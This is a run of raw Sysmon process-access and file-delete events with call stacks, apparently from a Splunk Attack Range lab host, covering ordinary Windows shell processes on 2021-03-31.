\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000010724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=311D5FE8B46A7CF10E08E960DCE8A9D0,SHA256=A0FED9CA8C5604760E51CF5E760B852408E3D1183F0A4A56D103AAFA1D95CB13,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57c95|C:\Windows\System32\TwinUI.dll+37528|C:\Windows\System32\TwinUI.dll+37448|C:\Windows\System32\TwinUI.dll+38893|C:\Windows\System32\TwinUI.dll+36e6d|C:\Windows\System32\TwinUI.dll+36c71|C:\Windows\System32\TwinUI.dll+10928d|C:\Windows\System32\TwinUI.dll+d211f|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57c95|C:\Windows\System32\TwinUI.dll+37590|C:\Windows\System32\TwinUI.dll+37435|C:\Windows\System32\TwinUI.dll+38893|C:\Windows\System32\TwinUI.dll+36e6d|C:\Windows\System32\TwinUI.dll+36c71|C:\Windows\System32\TwinUI.dll+10928d|C:\Windows\System32\TwinUI.dll+d211f|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000010847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.739{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:19.739{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43566964C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000010844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43566964C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565468C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565468C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000010839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:19.723{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.239{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9402ACC24B0BECF0E67D95DCDC015BA,SHA256=70453D60C709D7A694B0966ABDA9F66B46A89937AE9B119B232F6E3F13BC8A68,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:19.161{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.161{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
